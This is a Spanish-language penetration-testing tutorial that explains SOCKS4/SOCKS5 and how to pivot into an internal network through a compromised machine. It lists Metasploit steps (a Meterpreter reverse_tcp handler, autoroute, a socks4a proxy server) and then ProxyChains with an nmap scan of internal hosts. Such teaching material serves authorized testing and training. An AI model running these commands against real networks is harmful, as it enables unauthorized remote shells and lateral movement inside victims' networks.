¿Que es Socks?

SOCKS (Socket Secure) es un protocolo de red que facilita el enrutamiento del tráfico de red entre clientes y servidores a través de un proxy. SOCKS opera en la capa de sesión (capa 5) del modelo OSI y es utilizado para superar firewalls y sistemas de filtrado de tráfico. Existen dos versiones principales de SOCKS: SOCKS4 y SOCKS5, siendo SOCKS5 la versión más avanzada, que incluye soporte para autenticación y protocolos adicionales.

  • SOCKS4: Protocolo básico que maneja el tráfico TCP, pero no incluye autenticación.

  • SOCKS5: Protocolo más avanzado que maneja tráfico TCP y UDP, e incluye autenticación y soporte para protocolos adicionales.

Relación entre SOCKS y el Pivoting

El pivoting implica el uso de una máquina comprometida como un punto de tránsito para acceder a otras máquinas en una red interna que no son directamente accesibles desde la red externa. SOCKS juega un papel crucial en este proceso al actuar como un intermediario que redirige el tráfico a través de la máquina comprometida.

Cómo Utilizar SOCKS para Pivoting

  1. Configuración de un Proxy SOCKS en la Máquina Comprometida: Se instala y configura un servidor SOCKS en la máquina comprometida.

  2. Redirección del Tráfico a Través del Proxy SOCKS: El tráfico de la máquina atacante se redirige a través del proxy SOCKS utilizando herramientas como ProxyChains.

  3. Acceso a Recursos Internos: El proxy SOCKS permite a la máquina atacante acceder a recursos internos de la red comprometida como si estuviera directamente conectada a esa red.

Ejemplo de Uso de SOCKS en Pivoting

1. Configuración del Proxy SOCKS en la Máquina Comprometida (con Metasploit)

  • Paso 1: Establecer una sesión Meterpreter en la máquina comprometida.

    use exploit/multi/handler
    set payload windows/meterpreter/reverse_tcp
    set LHOST <your_IP>
    set LPORT <your_port>
    exploit
  • Paso 2: Configurar un route en Meterpreter.

    meterpreter > run autoroute -s <internal_network>/24
  • Paso 3: Iniciar un servidor SOCKS4a en Metasploit.

    use auxiliary/server/socks4a
    set SRVHOST 0.0.0.0
    set SRVPORT 1080
    run

2. Redirección del Tráfico a Través del Proxy SOCKS (con ProxyChains)

  • Paso 4: Configurar ProxyChains en la máquina atacante.

    echo "socks4 127.0.0.1 1080" >> /etc/proxychains.conf
  • Paso 5: Utilizar ProxyChains para redirigir el tráfico a través del proxy SOCKS.

    proxychains nmap -sT -Pn -n -p 80,443 <target_internal_IP>

Última actualización